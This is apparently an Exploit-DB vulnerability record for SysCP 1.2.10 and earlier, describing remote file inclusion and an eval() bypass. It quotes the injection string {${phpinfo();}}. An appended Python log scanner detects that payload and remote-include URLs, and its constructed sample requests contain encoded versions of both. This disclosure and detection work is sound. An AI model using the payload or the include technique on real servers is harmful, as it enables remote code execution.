Vendor: SysCP
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote File Include and Script Code Execution
CWE: 94
Product Name: SysCP
Affected Version From: SysCP 1.2.10 and prior versions
Affected Version To: SysCP 1.2.10 and prior versions
Patch Exists: YES
Related CWE: N/A
CPE: a:syscp:syscp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

SysCP Multiple Script Execution Vulnerabilities

SysCP is affected by multiple script execution vulnerabilities. The application is affected by a remote file include vulnerability. An attacker can include remote script code and execute it in the context of an affected server. Another script code execution vulnerability may allow an attacker to call arbitrary functions and scripts by bypassing a PHP eval() statement. The following string is sufficient to bypass the eval() call: {${phpinfo();}}

Mitigation:

Upgrade to the latest version of SysCP, which is not vulnerable to these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14490/info

SysCP is affected by multiple script execution vulnerabilities.

The following specific vulnerabilities were identified:

The application is affected by a remote file include vulnerability. An attacker can include remote script code and execute it in the context of an affected server.

Another script code execution vulnerability may allow an attacker to call arbitrary functions and scripts by bypassing a PHP eval() statement.

SysCP 1.2.10 and prior versions are prone to these vulnerabilities.

The following string is sufficient to bypass the eval() call:
{${phpinfo();}}
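
A log-review check for the two issues described above, added here as an example; it is not part of the advisory or of SysCP. It flags query parameters that carry PHP string-interpolation openers (`{$` or `${`) or a URL as their value. The access-log format, paths and parameter names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# PHP expands "{$...}" and "${...}" inside double-quoted strings, so either
# opener in user input that can reach eval() deserves a look.
INTERP = re.compile(r"\{\s*\$|\$\s*\{")
# A parameter whose value is itself a URL is the usual sign of a remote include.
REMOTE = re.compile(r"^\s*(?:https?|ftp)://", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the set of findings for one parameter value."""
    value = fully_decode(value)
    findings = set()
    if INTERP.search(value):
        findings.add("php-interpolation")
    if REMOTE.search(value):
        findings.add("remote-include")
    return findings

def scan(lines):
    """Yield (line_no, param, findings) for each suspicious query parameter."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            found = classify(value)
            if found:
                yield no, name, sorted(found)

# Constructed sample lines; paths and parameter names are hypothetical.
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2005:10:00:00 +0000] "GET /index.php?lang=en HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Aug/2005:10:00:05 +0000] "GET /index.php?tpl=%7B%24%7Bphpinfo()%3B%7D%7D HTTP/1.1" 200 9001',
    '192.0.2.11 - - [01/Aug/2005:10:00:09 +0000] "GET /index.php?tpl=%257B%2524%257Bphpinfo()%257D%257D HTTP/1.1" 200 9001',
    '192.0.2.12 - - [01/Aug/2005:10:01:00 +0000] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 77',
]
```

Calling `list(scan(SAMPLE))` reports lines 2 to 4; a hit is a lead for review, not proof that the request reached a vulnerable code path.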